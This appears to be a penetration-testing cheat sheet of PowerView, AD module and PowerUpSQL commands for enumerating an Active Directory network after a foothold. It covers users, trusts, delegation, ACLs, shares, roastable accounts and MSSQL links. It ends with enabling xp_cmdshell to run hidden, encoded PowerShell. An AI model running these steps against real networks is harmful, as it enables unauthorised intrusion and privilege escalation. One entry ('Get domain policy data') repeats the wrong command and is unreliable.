Active Directory
Introduction
Once the attacker has obtained a foothold on a computer inside an Active Directory network, its design must be understood, including the number of users, groups, computers, OUs, ACLs, and their relationships.
In this phase, the attacker should be focused on enumerating information that can be further used to elevate privileges or perform lateral movements.
Domain
General Information
Get current domain
Get-Domain [-Domain <DIFFERENT_DOMAIN>]
Get current domain controller
Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl
Get domain policy data
Get-DomainController [-Domain <DIFFERENT_DOMAIN>] | select Forest, Name, OSVersion | fl
Forest
Return the forest object
Get-Forest [-Forest <FOREST>]
Get all domains from your current forest
Get-ForestDomain [-Forest <FOREST>]
Get the Global Catalogs of the forest
Get-ForestGlobalCatalog [-Forest <FOREST>]
Trust
Return all domain trusts for the current or specified domain
Get-DomainTrust [-Domain <DomainName>]
Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds.
Get-DomainTrustMapping
Return all forest trusts for the current forest or a specified forest.
Get-ForestTrust [-Forest <"FOREST>"]
Users
General Information
Obtain users
Get-DomainUser -Identity <USERNAME> [-Properties DisplayName, MemberOf | fl]
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname
Built-in accounts
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name, Description
Get group memberships
Get-DomainGroup -UserName "<USERNAME>"
Obtain the Last time a password was set of each user
Get-ADUser -Filter * -Properties * | select name ,logoncount ,@{expression={[datetime]::fromFileTime($_pwdlastset)}}
Finds domain machines where specific users are logged into. By default 'Domain Admins'
Find-DomainUserLocation -Verbose [-CheckAccess] [{-UserGroupIdentity|-UserIdentity} <Identity>]
Security
Kerberoast
Get-DomainUser -SPN | select serviceprincipalname
AS-Reporoast
Get-DomainUser -PreauthNotRequired -Verbose
Search passwords on the description attribute
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name, Description
Show in which machine you are admin (based on your current privileges)
Find-LocalAdminAccess
Constrained delegation
Get-NetUser -TrustedToAuth
Groups
List all the groups in the current domain
Get-DomainGroup [| where Name -like "*Admins*" | select SamAccountName]
List all the members in a specific group:
Get-DomainGroupMember -Identity "Domain Admins" [| select MemberDistinguishedName]
List groups of a user
Get-ADPrincipalGroupMembership <USER>
Get GPOs of a group
Get-DomainGPOUserLocalGroupMapping [-Identity "<GROUP_NAME>" | -LocalGroup Administrators] | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
Computers
General information
List computers
Get-NetComputer [| select samaccountname, DnsHostName, operatingsystem]
Get-DomainComputer -OperatingSystem "*Server 2016*"
# Get Name, IP and Operating System
Get-NetComputer -Properties name,dnshostname, OperatingSystem | ForEach-Object { $_ | Add-Member -NotePropertyName IPAddressV4 -NotePropertyValue (Resolve-DnsName -Type A -Name $_.dnshostname).IPAddress -Force; $_ } | Select-object -Property name,dnshostname,IPAddressV4, OperatingSystem | Format-Table -AutoSize
Return PCs that can be pinged
Get-NetComputer -Ping
Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName | fl Address,IPV4Address,IPV6Address,ResponseTime}
Get users logged on (Requires admin privileges)
Get-NetLoggedon -ComputerName "<COMPUTER_NAME>" | Select Username
Get locally logged on users
Get-LoggedonLocal -ComputerName "<HOSTNAME>"
Enumerates local or groups on a machine (Requires admin privileges).
Get-NetLocalGroup -ComputerName "<HOSTNAME>"
# Get the members of Local Groups
Get-NetLocalGroupMember -ComputerName "<HOSTNAME>" -GroupName "<GROUP_NAME>"
Returns the last user who logged onto the local machine (Requires administrative rights and remote registry enabled on the target)
Get-LastLoggedOn -ComputerName <HOSTNAME>
Security
Enumerate all ACES for all domain computers that matches our current computer.
Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_ | Select-object -Property ObjectDN,ActiveDirectoryRights, AceType,ObjectAceType, Identity | Format-List}}
Computers with unconstrained delegation: Exploitation at Unconstrained Delegation
Get-DomainComputer -UnConstrained | select samaccountname
Computers with constrained delegation: Exploitation at Constrained Delegation
Get-DomainComputer -TrustedToAuth | select name,msds-allowedtodelegateto,useraccountcontrol | fl
Get-NetComputer | where-object {$_."msds-allowedtodelegateto" -ne $null} | select name, msds-allowedtodelegateto, useraccountcontrol | fl
Get-NetComputer <COMPUTER_NAME> | Select-Object -ExpandProperty msds-allowedtodelegateto | fl
Resource-Based Constrained Delegation: Exploitation at Resource-Based Constrained Delegation (GenericWrite to Computer)
Need a privilege like WriteProperty, GenericAll, GenericWrite or WriteDacl on the computer object:
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|GenericWrite|GenericAll|WriteDacl" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
Group Policies Objects (GPO)s
General information
Get list of GPO in current domain.
Get-DomainGPO [-ComputerIdentity <COMPUTER_NAME>] -Properties DisplayName | sort -Property DisplayName
Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences:
Get-DomainGPOLocalGroup [-ComputerIdentity <COMPUTER_NAME>] | select GPODisplayName, GroupName
Enumerates the machines where a specific domain user/group is a member of a specific local group (Useful for finding where domain groups have local admin access):
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName | fl
Finds what users/groups are in the specified local group for a target machine through GPO correlation
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity "<HOSTNAME>"
Get Modifiable GPOs
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty|GenericWrite" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
Principals with "Create groupPolicyContainer objects" privilege
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }
Organizational Units (OU)
Get Domain Organizational Units:
Get-DomainOU [-Properties Name | sort -Property Name]
Get GPO applied to an OU
Get-DomainGPO -Identity "<GPLink_RelativeCN>"
Access Control Lists (ACL)s
Enumerate user rights:
Get-ObjectAcl -SamAccountName "<USER>" -ResolveGUIDs
Returns the ACLs associated with a specific active directory object.
Get-DomainObjectAcl -ResolveGUIDs -SamAccountName "<USERNAME>"
Finds interesting object ACLS in the current domain
Find-InterestingDomainAcl -ResolveGUIDs
Enumerate RDP Users permissions
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
Shares
Enumerate shares:
Find-DomainShare
# Enumerate the Domain Shares the current user has access
Find-DomainShare -CheckShareAccess
Enumerates the shares you have access
Find-DomainShare -CheckShareAccess
Find shares on hosts in current domain.
Invoke-ShareFinder -Verbose
Get all fileservers of the domain
Get-NetFileServer
Searches for files matching specific criteria on readable shares in the domain
Invoke-FileFinder -Verbose
MSSQL
General information
Discover Active Directory Domain SQL Server Instances
Get-SQLInstanceDomain
Tests if the current Windows account or provided SQL Server login can log into an SQL Server.
Get-SQLConnectionTest -Instance "<HOSTNAME,PORT>" | fl
# If there are several instances use the following oneline
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
Returns basic server and user information from target SQL Servers.
Get-SQLServerInfo -Instance "<HOSTNAME,PORT>"
Links
Look for links to remote servers
Get-SQLServerLink -Verbose -Instance "<HOSTNAME,PORT>"
Enumerate and follow MSSQL database links
Get-SQLServerLinkCrawl -Verbose -Instance "<HOSTNAME,PORT>"
Perform Queries
Perform queries
Get-SQLQuery -Instance "<HOSTNAME,PORT>" -Query "select @@servername"
Perform queries using the linked database
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');
CMDShell
Check if xp_cmdshell module is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'
Enable xp_cmdshell
sp_configure 'Show Advanced Options', 1; RECONFIGURE;sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Execute commands
"EXEC xp_cmdshell 'powershell -w hidden -enc <ENCODED_COMMAND>';
Tools
LinWinPwn: Automates a number of Active Directory Enumeration and Vulnerability checks.
PowerView: PowerShell tool to gain network situational awareness on Windows domains.
ADSearch: Perform LDAP queries.
PowerUPSQL: Module that includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post-exploitation actions such as OS command execution.
ADModule: The Active Directory module for Windows PowerShell.
References
Last updated